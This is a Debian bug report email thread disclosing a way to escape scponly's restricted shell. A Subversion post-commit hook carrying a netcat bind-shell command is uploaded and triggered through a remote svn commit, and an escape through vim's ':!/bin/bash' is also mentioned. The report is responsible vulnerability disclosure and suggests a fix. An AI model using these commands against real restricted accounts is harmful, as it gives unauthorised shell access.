Hi Joachim,
On 10.08.2007, at 19:54, Joachim Breitner wrote:
Package: scponly
Version: 4.6-1
X-Debbugs-CC: [EMAIL PROTECTED]
Severity: grave
Tags: security
Hi Thomas Wana,
messing around with some friends here, I tried to access his computer
with only a scponly protected account. I discovered this way of
gaining
full shell access:
Nice and creative way :-)
Can you please get in touch with the scponly-mailinglist,
this should be discussed there and fixed upstream.
Tom
I locally created a subversion repository /tmp/blubb with
a /tmp/blubb/hooks/post-commit that contains the command:
( nc -l -p 1042 -e /bin/bash) &
I copy this repositry using
scp -r /tmp/blubb/ [EMAIL PROTECTED]:
Then I check out the repository remotely:
ssh [EMAIL PROTECTED] /usr/bin/svn co file:///home/user/blubb bla
Now I add a file and commit it:
touch blah
scp blah [EMAIL PROTECTED]:bla/
ssh [EMAIL PROTECTED] /usr/bin/svn ci bla
At this point, I have a vim instance running, asking me for the commit
message. I could now just run
:!/bin/bash
to get a shell, but having done the post-commit hook already, I
want to
use that, so I write something and quit the editor with :x
At this point, I can use
nc host 1042
and I have a shell for the account that should have none.
The solution would be: Do not enable access to svn
(or svnserve), which is a simple compilation option. I’d appreciate it
if this gets fixed in debian etch.
I have sent this information to [EMAIL PROTECTED] and scponly’s
upstream maintainer last week, but have not yet gotten a response.
Greetings,
Joachim
--
Joachim "nomeata" Breitner
Debian Developer
[EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C
JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata
